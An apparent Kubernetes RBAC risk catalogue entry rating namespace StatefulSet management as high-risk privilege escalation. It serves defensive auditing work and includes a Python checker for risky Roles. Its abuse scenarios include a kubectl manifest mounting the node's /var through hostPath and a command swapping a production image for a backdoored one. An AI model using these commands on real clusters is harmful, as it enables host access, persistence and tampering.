Manage StatefulSets in a namespace
Elevation of Privilege
High
Overview
Field | Value |
---|---|
ID | 1038 |
Name | Manage StatefulSets in a namespace |
Risk Category | Elevation of Privilege |
Risk Level | High |
Role Type | Role |
API Groups | apps |
Resources | statefulsets |
Verbs | create, update, patch, delete |
Tags | Persistence PotentialPrivilegeEscalation Tampering WorkloadLifecycle |
Description
Allows creating, updating, or deleting StatefulSets within a specific namespace. This can be used to deploy stateful applications with potentially privileged settings, leading to potential privilege escalation, persistence, and tampering within that namespace.
Abuse Scenarios
- Create a new StatefulSet with a hostPath mount in the namespace.
```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: hostpath-statefulset
spec:
  serviceName: "hostpath-service"
  replicas: 1
  selector:
    matchLabels:
      app: hostpath-sts
  template:
    metadata:
      labels:
        app: hostpath-sts
    spec:
      containers:
      - name: hostpath-container
        image: busybox
        command: ["/bin/sh", "-c", "sleep infinity"]
        volumeMounts:
        - mountPath: /host-var
          name: host-var
      volumes:
      - name: host-var
        hostPath:
          path: /var
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
```
- Update an existing StatefulSet’s image to a malicious one.
```bash
kubectl set image statefulset/<statefulset-name> <container-name>=<malicious-image> -n <namespace>
# Example: kubectl set image statefulset/my-app-db db=attacker/db-backdoor -n production
```
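
A defender-side check for the rule in the Overview table, as an added example that is not part of the original page: it reports which Roles grant any of the listed verbs on `statefulsets` in the `apps` group, including wildcard grants. Treating a single matching verb as a finding, the helper `_role` and the sample Roles are assumptions made for illustration; `resourceNames` restrictions are not evaluated.

```python
# Added example; the Role objects in SAMPLE_ROLES are constructed for illustration.
RISKY_VERBS = {"create", "update", "patch", "delete"}

def granted_statefulset_verbs(role):
    """Return the sorted rule verbs a Role grants on apps/statefulsets."""
    granted = set()
    for rule in role.get("rules") or []:
        groups = set(rule.get("apiGroups") or [])
        resources = set(rule.get("resources") or [])
        verbs = set(rule.get("verbs") or [])
        # "*" is the RBAC wildcard for API groups, resources and verbs.
        if not groups & {"apps", "*"}:
            continue
        # Subresources such as statefulsets/scale do not grant the resource itself.
        if not resources & {"statefulsets", "*"}:
            continue
        granted |= (RISKY_VERBS if "*" in verbs else RISKY_VERBS & verbs)
    return sorted(granted)

def audit(roles):
    """Map "namespace/name" to the granted verbs for each matching Role."""
    findings = {}
    for role in roles:
        verbs = granted_statefulset_verbs(role)
        if verbs:
            meta = role.get("metadata") or {}
            findings[f"{meta.get('namespace', '?')}/{meta.get('name', '?')}"] = verbs
    return findings

def _role(ns, name, groups, resources, verbs):
    # Hypothetical helper: builds a Role in the shape of the Kubernetes JSON output.
    return {"kind": "Role", "metadata": {"namespace": ns, "name": name},
            "rules": [{"apiGroups": groups, "resources": resources, "verbs": verbs}]}

SAMPLE_ROLES = [  # constructed
    _role("production", "sts-deployer", ["apps"], ["statefulsets"], ["get", "list", "patch", "update"]),
    _role("production", "sts-viewer", ["apps"], ["statefulsets"], ["get", "list", "watch"]),
    _role("staging", "ns-admin", ["*"], ["*"], ["*"]),
    _role("staging", "sts-scaler", ["apps"], ["statefulsets/scale"], ["patch", "update"]),
    _role("staging", "pod-creator", [""], ["pods"], ["create"]),
]

if __name__ == "__main__":
    for name, verbs in audit(SAMPLE_ROLES).items():
        print(f"{name}: {', '.join(verbs)}")
```

In a cluster, the same function can be run over the `items` array of `kubectl get roles -A -o json`.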